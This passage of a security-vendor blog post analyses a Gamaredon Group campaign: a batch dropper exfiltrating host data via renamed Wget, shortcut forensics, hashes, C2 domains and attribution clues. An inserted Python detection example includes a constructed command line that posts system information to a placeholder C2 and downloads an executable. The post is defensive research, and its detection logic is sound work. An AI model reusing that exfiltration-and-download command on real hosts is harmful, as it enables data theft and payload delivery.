command):<\/p>\n<ul>\n<li>-e http_proxy=http:\/\/[Proxy Server]<\/li>\n<li>--proxy-user=[Proxy 
username]<\/li>\n<li>--proxy-password=[Proxy password]<\/li>\n<\/ul>\n<p>Among the arguments, one parameter stands out: versiya=wrar. Versiya is a transliteration of the Russian \u0412\u0435\u0440\u0441\u0438\u044f or Ukrainian \u0412\u0435\u0440\u0441\u0456\u044f, meaning version. Since it is set to wrar, we assume it tells the C2 how the payload was delivered: in this case, the initial file mirotvorec.rar carries the exploit for the WinRAR unacev2 module.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_752299263.img.png\" alt=\"Figure 21. Data exfiltration and payload dropping code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 21. Data exfiltration and payload dropping code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>After config.exe returns, the script launches the main payload downloaded from the C2. To sum up, the script:<\/p>\n<ul>\n<li>Collects information about the infected host<\/li>\n<li>Sends it to the C2 via config.exe<\/li>\n<li>Downloads and launches the main payload<\/li>\n<\/ul>\n<p>Analyzing config.exe, we found that it is a legitimate build of GNU Wget 1.11.4 with OpenSSL support, compiled for Windows. The file is quite old: its compilation date goes back to 2009. 
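<\/p>\n<p>From a process-telemetry standpoint the routine above is noisy: one cmd.exe spawning systeminfo, timeout, ping, taskkill and a renamed wget that POSTs the host inventory. The following Python is an added detection example, not part of the original analysis or of any vendor product. It scores the children of each parent process against that sequence. The event records use an assumed schema (pid, ppid, image, cmd), and the C2 host, proxy and credentials in them are constructed placeholders, not indicators from the campaign.<\/p>

```python
import re
from collections import defaultdict

# Dynamic-DNS suffixes worth flagging in a command line (assumption: extend to your environment).
DYNDNS_SUFFIXES = ('.ddns.net', '.no-ip.org', '.hopto.org', '.duckdns.org')


def _image(e):
    return e['image'].lower()


def long_ping(e):
    '''ping -n N with a large count doubles as a sleep and a connectivity check.'''
    m = re.search('-n +([0-9]+)', e['cmd'])
    return _image(e) == 'ping.exe' and m is not None and int(m.group(1)) >= 5


def spoofed_wget(e):
    '''A renamed binary speaking wget: --post-data carrying host details, not named wget.'''
    cmd = e['cmd']
    return '--post-data=' in cmd and 'sysinfo=' in cmd and not _image(e).startswith('wget')


SIGNALS = {
    'recon_systeminfo': lambda e: _image(e) == 'systeminfo.exe',
    'sleep_timeout': lambda e: _image(e) == 'timeout.exe',
    'sleep_ping': long_ping,
    'kill_prior_payload': lambda e: _image(e) == 'taskkill.exe' and '/im' in e['cmd'].lower(),
    'post_sysinfo': spoofed_wget,
    'dyndns_c2': lambda e: any(s in e['cmd'].lower() for s in DYNDNS_SUFFIXES),
    'proxy_creds_on_cmdline': lambda e: '--proxy-user=' in e['cmd'] or '--proxy-password=' in e['cmd'],
    'download_exe': lambda e: re.search('-O +[^ ]+[.]exe', e['cmd']) is not None,
}


def score_process_trees(events, min_signals=4):
    '''Group child processes by parent pid and report parents whose children together match
    the dropper routine. The exfiltration POST is mandatory so that ordinary inventory
    scripts (systeminfo plus a ping) do not fire on their own.'''
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e['ppid']].append(e)
    findings = {}
    for ppid, children in by_parent.items():
        hits = sorted({name for e in children for name, test in SIGNALS.items() if test(e)})
        if 'post_sysinfo' in hits and len(hits) >= min_signals:
            findings[ppid] = hits
    return findings


# Constructed process-creation events modelled on the batch routine above. Pids, the batch
# name, the C2 host, the proxy and the credentials are placeholders, not campaign indicators.
C2 = 'http://example-c2.ddns.net/'
EVENTS = [
    {'pid': 410, 'ppid': 400, 'image': 'cmd.exe', 'cmd': 'cmd.exe /c 5493.cmd'},
    {'pid': 411, 'ppid': 410, 'image': 'systeminfo.exe', 'cmd': 'systeminfo'},
    {'pid': 412, 'ppid': 410, 'image': 'timeout.exe', 'cmd': 'timeout /T 40'},
    {'pid': 413, 'ppid': 410, 'image': 'PING.EXE', 'cmd': 'ping -n 14 google.com'},
    {'pid': 414, 'ppid': 410, 'image': 'taskkill.exe', 'cmd': 'taskkill /F /IM librelogout.exe'},
    {'pid': 415, 'ppid': 410, 'image': 'config.exe', 'cmd': (
        'config.exe --user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0 '
        '--post-data=versiya=wrar&comp=USER-PC&id=1234&sysinfo=placeholder ' + C2 +
        ' -q -N ' + C2 + ' -O librelogout.exe -e http_proxy=http://proxy.corp.example:8080 '
        '--proxy-user=jdoe --proxy-password=hunter2')},
    # Benign control: an admin inventory script that collects systeminfo and checks connectivity.
    {'pid': 520, 'ppid': 500, 'image': 'systeminfo.exe', 'cmd': 'systeminfo'},
    {'pid': 521, 'ppid': 500, 'image': 'PING.EXE', 'cmd': 'ping -n 10 intranet.example'},
]


if __name__ == '__main__':
    for ppid, hits in score_process_trees(EVENTS).items():
        print(ppid, hits)
```

<p>Requiring the POST signal keeps the benign control in the sample quiet while the dropper chain scores on all eight signals. The cleartext proxy credentials on the command line deserve an alert of their own: the script hands the user\u2019s stored proxy password to a process that then talks to a dynamic-DNS host.<\/p>\n<p>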
Apparently, the attackers decided not to reinvent the wheel and simply used an open-source tool to exfiltrate host data and download the main payload.<\/p>\n<h2>Going Deep into the Shortcut<\/h2>\n<p>In addition to analyzing their techniques, we also wanted to collect more information about the attackers. Fortunately, the shortcut they made helps us here.<\/p>\n<p>Windows shortcuts are small files that simplify our lives by providing fast access to files, applications, and URLs. They also simplify the forensic analysis of malicious campaigns, because a .lnk file carries a good deal of information about the machine it was created on that is hidden from the user.<\/p>\n<p>First, let\u2019s check \u201cGoggle Chrome.lnk\u201d by opening its properties:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image.img.png\" alt=\"Figure 22. Artifacts in the shortcut\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 22. Artifacts in the shortcut<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>First, we see that the shortcut contains the Russian string \u0414\u043e\u0441\u0442\u0443\u043f \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 in the comment field, which translates to Internet access. This text is shown when hovering the mouse over the shortcut. A real Google Chrome shortcut carries the same comment, in the language of the system it was created on. 
So, we can guess that Windows with the Russian language pack was used to create the malicious shortcut.<\/p>\n<p>Another artifact left by the attackers is the password they used to unpack win.exe.<\/p>\n<p>The -p switch tells the WinRAR SFX to use a password when unpacking. So the rest of the string \u2013 fvthbrfycrbte,k.lrb \u2013 is the password. If you switch your keyboard layout to Russian and type the password characters, you eventually recover an obscene phrase in Russian: \u201c\u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u0435\u0443**\u044e\u0434\u043a\u0438\u201d, which translates to \u201cAmerican b**tards\u201d. Is this an Easter egg left by the Gamaredon Group?<\/p>\n<p>Next, let\u2019s move to the shortcut internals. Using a parser for the .lnk structure, we can extract more information from the file. We decided to use <a href=\"https:\/\/code.google.com\/archive\/p\/lnk-parser\/\">LNK Parser<\/a>, a tool that can generate very detailed HTML reports.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_978287538.img.png\" alt=\"Figure 23. Part of the report generated by LNK Parser\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 23. 
Part of the report generated by LNK Parser<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As it contains quite a lot of information, we will focus on the most interesting pieces:<\/p>\n<ul>\n<li>The .lnk file was created on 08.04.2019 09:27:06 (UTC).<\/li>\n<li>The shortcut was created on a drive with the serial number: <b style=\"\">3c76-6c45<\/b><\/li>\n<li>Another path is hardcoded in the shortcut \u2013 C:\\Users\\<b style=\"\">USER<\/b>\\win.exe. This is probably the same <b style=\"\">USER<\/b> that created the decoy MS Office documents.<\/li>\n<li>PC NetBIOS name: <b style=\"\">user-pc<\/b><\/li>\n<li>MAC address of the machine: <b style=\"\">08:00:27:BC:C2:24<\/b> (VirtualBox)<\/li>\n<\/ul>\n<p>We decided to use this information to search for any other samples containing the same MAC address, drive serial number, or any other unique data from the shortcut.<\/p>\n<p>Once the samples were found, we analyzed and extracted other pieces of information that could also help us with attribution. The general behavior of the samples found was mostly the same: SFX archive, batch command file, shortcuts. The only parts that differed were the bait files and sometimes the batch scripts used by the attackers.<\/p>\n<p>First, we looked at a sample very similar to the one we researched in depth \u2013 mirotvorec.rar. The name of the archive is the same as the source of the decoy image shown in Figure 4. There were only three main differences we observed: the lack of decoy files (text files and the ssu_zakon.docx), different icons used for win.exe and winlog.exe, and a third difference that lies in the batch script. 
It is the user agent string written in the script:<\/p>\n<ul>\n<li>&quot;Mozilla\/5.0 (Linux; <b>Android<\/b> 7.1.1; SM-J510H Build\/NMF26X) Mobile Safari\/537.36&quot;<\/li>\n<\/ul>\n<p>It looks like the criminal actors are still experimenting with the campaign, trying different patterns by changing the bait and slightly modifying the dropper malware.<\/p>\n<p>We also discovered a non-political sample called vpnclient-win-msi-5.0.07.0410-k9.exe. The sample does not use the WinRAR unacev2.dll vulnerability, and actually contains a legitimate VPN client tool along with a malicious script that is launched in the background. Analyzing the shortcut file used in the sample, we found other interesting information left by the actors.<\/p>\n<p>The sample hash is 5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90.<\/p>\n<p>Data extracted from the shortcut included:<\/p>\n<ul>\n<li>Created: 19.03.2019 07:49:13 (UTC)<\/li>\n<li>C:\\Users\\Carson\\1.exe<\/li>\n<li>Carson (C:\\\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438)<\/li>\n<li>NetBIOS name: <b style=\"\">user-pc<\/b><\/li>\n<li>Drive serial number: <b style=\"\">3c76-6c45<\/b><\/li>\n<li>MAC address: <b style=\"\">08:00:27:BC:C2:24<\/b><\/li>\n<\/ul>\n<p>Here we can see the username of the attacker\u2019s OS account \u2013 Carson. The NetBIOS name, hard drive serial number, and MAC address remained the same.<\/p>\n<p>This sample has a slight difference in the unpacking method. 
This time, instead of the shortcut, the attackers hid the password inside the batch script.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1792208938.img.png\" alt=\"Figure 24. Password hardcoded in the script\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 24. Password hardcoded in the script<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As in the previous samples, the password is an obscene phrase in Russian written in an English keyboard layout.<\/p>\n<p>Another sample that caught our attention was a .lnk shortcut file called 6228. The hash of the file is 995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d, and some of the extracted data follows:<\/p>\n<ul>\n<li>Created 01.07.2019 10:36:33 (UTC)<\/li>\n<li>Strings\n<ul>\n<li>_7-ZIP (F:\\VZLOM\\SBORKA_SCR)<\/li>\n<li>F:\\VZLOM\\SBORKA_SCR\\_7-ZIP\\WinRAR.exe<\/li>\n<li>New password used: \u201c<b>dst,bntct,zd;jgegbyljcrbtcerb<\/b>\u201d<\/li>\n<\/ul>\n<\/li>\n<li>PC NetBIOS name: \u0448\u0430\u043c\u0430\u043d-\u043f\u043a<\/li>\n<li>Drive serial number: <b>3c76-6c45<\/b><\/li>\n<li>MAC address: <b>08:00:27:BC:C2:24<\/b><\/li>\n<\/ul>\n<p>This time, we observe that the malicious actor changed the VM PC name from user-pc to shaman-pc (written in Russian). The MAC address and drive serial number are the same. Other interesting artifacts include the paths they forgot to clean out. The words VZLOM and SBORKA_SCR translate from Russian as Hacking and SCR Constructor, respectively. 
This means they are using other specialized tools to generate .scr malware. These tools, based on the drive letter F, are possibly stored on a USB flash drive or a shared folder connected to the VM.<\/p>\n<p>Another trace the group left behind is the new SFX unpacking password \u2013 \u201cdst,bntct,zd;jgegbyljcrbtcerb\u201d \u2013 which is, again, an obscene phrase in Russian typed in an English keyboard layout.<\/p>\n<p>Besides this, other similar samples were observed:<\/p>\n<p>1.\u00a0<b>0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7<\/b><\/p>\n<ul>\n<li>LNK shortcut file<\/li>\n<li>Creation date 04\/12\/2019 10:44:08 UTC\n<ul>\n<li>Last modified 05\/06\/2019 11:45:30 UTC<\/li>\n<\/ul>\n<\/li>\n<li>New password used: <b>gblfhsuyjqyst<\/b><\/li>\n<\/ul>\n<p>2.\u00a0<b>79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1<\/b><\/p>\n<ul>\n<li>MS Office document<\/li>\n<li>Create date: 2019:07:22 12:08:00 (GMT)<\/li>\n<li>Author: <b>mmkrasny<\/b><\/li>\n<li>Last modified by: <b>\u041a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0447 Windows<\/b><\/li>\n<li>C2: wifc[.]website<\/li>\n<\/ul>\n<p>This sample uses VBA macros to drop a payload. Checking the C2, we can see that it resolves to 5.252.193[.]204. 
From another malicious domain that shares the same IP address \u2013 wifu[.]site \u2013 an additional sample has been retrieved:<\/p>\n<p>3.\u00a0<b>bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac<\/b><\/p>\n<ul>\n<li>7-Zip SFX archive<\/li>\n<li>TimeDateStamp \u2013 31.12.2012 00:38:51 GMT<\/li>\n<li>Contains 3 files:\n<ul>\n<li>8331.txt<\/li>\n<li>13446.cmd<\/li>\n<li>14638<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Inside the batch script 13446.cmd, which differs slightly from the sample discussed above, we found this additional information:<\/p>\n<ul>\n<li>C2: hxxp:\/\/bits-tor[.]host<\/li>\n<li>Contains another password: <b>whevelfrb<\/b><\/li>\n<li>Schedules a task to achieve persistence<\/li>\n<\/ul>\n<p>The information extracted from the samples could now be used to search for any other campaigns run by this group or to link old campaigns to one actor.<\/p>\n<h2>Attacker Profile<\/h2>\n<p>After we analyzed the data left inside the samples, we summarized the information we had collected to get an idea of who hides behind the group.<\/p>\n<p>On one hand, these malicious actors have been operating since mid-2013, so they have more than 6 years of experience.<\/p>\n<ul>\n<li>They are not asking for a ransom<\/li>\n<li>They only target information from the military, government, and other high-level Ukrainian sources.<\/li>\n<li>The main infection strategy is spear-phishing, with well-crafted bait documents that sometimes cannot be found in public sources.<\/li>\n<li>They use publicly available legitimate tools to avoid detection and to create their malicious samples.<\/li>\n<\/ul>\n<p>On the other hand, the traces they left in the malware highlight some basic mistakes.<\/p>\n<ul>\n<li>They use poorly obfuscated batch scripts that can be easily analyzed<\/li>\n<li>The leftover paths inside the shortcuts contain usernames, folder names, and file names. 
For state-sponsored hackers, this is very risky because any piece of information could unmask the author<\/li>\n<li>Much of the data is written in Russian and not in Ukrainian<\/li>\n<li>The passwords contain hateful statements in Russian that look like personal messages from the actor. This type of behavior is typical of authors seeking self-affirmation rather than of professional cybercriminals.<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>While analyzing a campaign run by the Gamaredon group, we discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis. Judging by how much Russian is used in the malware, the group undoubtedly has strong Russian ties.<\/p>\n<p>Summarizing our observations regarding the Gamaredon group, we can say that the tools and methods used are more likely to be associated with political activists than with special services. Unfortunately, we do not have enough proof to be sure about that. 
Further monitoring of their campaigns could probably show us the real face of Gamaredon.<\/p>\n<p>-= FortiGuard Lion Team =-<\/p>\n<h2>MITRE ATT&amp;CK Matrix<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_646746889.img.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a 
href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.\u00a0<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/26IW--EI8yU\/gamaredon-group-ttp-profile-analysis.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_956427934.img.png\"\/><br \/>Learn more about the tactics, techniques, and procedures used by the Gamaredon Group in their latest malicious campaign.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/26IW&#8211;EI8yU&#8221; height=&#8221;1&#8243; width=&#8221;1&#8243; 
alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16137","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16137","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16137"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16137\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16137"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16137"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}